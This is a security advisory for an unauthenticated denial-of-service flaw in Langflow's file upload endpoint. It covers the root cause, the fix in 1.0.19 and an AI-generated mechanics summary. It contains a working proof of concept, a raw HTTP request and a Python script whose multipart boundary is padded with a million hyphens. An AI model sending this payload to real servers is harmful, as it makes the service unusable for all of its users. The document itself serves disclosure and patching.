Langflow: Unauthenticated DoS through multipart form boundary file upload
Description
Summary
An attacker can send a /api/v1/files/upload/ request without any authentication token/cookies and abuse a very long multipart form boundary to make the langflow app unusable for all users for an indefinite amount of time.
### Details https://github.com/langflow-ai/langflow/blob/v1.0.18/src/backend/base/langflow/api/v1/files.py#L40
The file upload function will try to process the multipart form data even if it is malformed and contains a payload such as an extremely large amount of hyphens after the boundary. It also does not do the authentication check before trying to process this data so an unauthenticated attacker can perform this as well as authenticated users.
Additionally, an attacker doesn't even need to know a valid UUID of a flow to send this request because the server will still try to process the large boundary even with any random value in place of the flow ID.
PoC
An attacker makes this request to upload a file without valid authentication information or a valid flow ID:
POST /api/v1/files/upload/test HTTP/1.1
Host: 127.0.0.1:7860
Content-Length: 3000192
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryorGBAKSkv5wR6WqJ
Accept: application/json, text/plain, */*
Origin: http://127.0.0.1:7860
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryorGBAKSkv5wR6WqJ
Content-Disposition: form-data; name="file"; filename="dos.txt"
Content-Type: text/plain
DoS in progress!
------WebKitFormBoundaryorGBAKSkv5wR6WqJ------------
Here is the request in python:
import requests
url = "http://127.0.0.1:7860/api/v1/files/upload/test"
headers = {
"Content-Type": "multipart/form-data; boundary=---------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ"
}
data = (
"-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ\r\n"
"Content-Disposition: form-data; name=\"file\"; filename=\"dos.txt\"\r\n"
"Content-Type: text/plain\r\n\r\n"
"DoS in progress\r\n"
"-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ--" + '-' * 1000000 + "\r\n"
)
response = requests.post(url, headers=headers, data=data)
The app will then be stuck in the "server is busy" state for all users:
Impact
Sending this request will result in the server being unusable for all users for an infinite amount of time because the request can be repeated as much as you want.
Patches
Fixed in 1.0.19 via PR #3923. A check_boundary HTTP middleware was added that validates the multipart boundary (^[\w\-]{1,70}$) and rejects malformed requests — including the oversized-hyphen payload — with HTTP 422 before the body is parsed. The upload endpoint also gained an authentication and flow-ownership check (get_current_active_user + 403 on mismatch), closing the unauthenticated access vector. Upgrade to 1.0.19 or later.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1- Range: <1.0.19
Patches
Vulnerability mechanics
Root cause
"Missing input validation on multipart boundary length and missing authentication check in the file upload endpoint allow an unauthenticated attacker to exhaust server resources."
Attack vector
An unauthenticated attacker sends a POST request to `/api/v1/files/upload/<any>` with a `Content-Type` header containing a multipart boundary followed by an extremely long sequence of hyphens (e.g., 1,000,000 dashes) [ref_id=1]. The server attempts to parse this oversized boundary, consuming excessive resources and rendering the application unusable for all users indefinitely. No authentication token, valid flow UUID, or prior access is required [ref_id=2]. The attack can be repeated arbitrarily to maintain the denial-of-service condition.
Affected code
The vulnerability resides in the file upload endpoint at `src/backend/base/langflow/api/v1/files.py` (line 40 in v1.0.18). The `upload_file` function processes multipart form data without first validating the boundary length or authenticating the user, and it does not require a valid flow ID. The patch adds a `check_boundary` middleware in `src/backend/base/langflow/main.py` and injects authentication/ownership checks into the upload handler.
What the fix does
The patch introduces a `check_boundary` HTTP middleware in `main.py` that validates the multipart boundary against the regex `^[\w\-]{1,70}$` and rejects malformed requests with HTTP 422 before the body is parsed [patch_id=6633370]. It also verifies that the body starts with `--<boundary>` and ends with `--<boundary>--\r\n`, blocking the oversized-hyphen payload. Additionally, the `upload_file` endpoint now requires `get_current_active_user` and checks that the flow belongs to the authenticated user (403 on mismatch), closing the unauthenticated access vector.
Preconditions
- authNo authentication required; any unauthenticated network client can send the request
- inputNo valid flow UUID needed; any arbitrary string in the URL path is accepted
- configThe server must be running langflow < 1.0.19 with the vulnerable endpoint exposed
- networkAttacker must be able to send HTTP POST requests to the target server
Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4News mentions
0No linked articles in our index yet.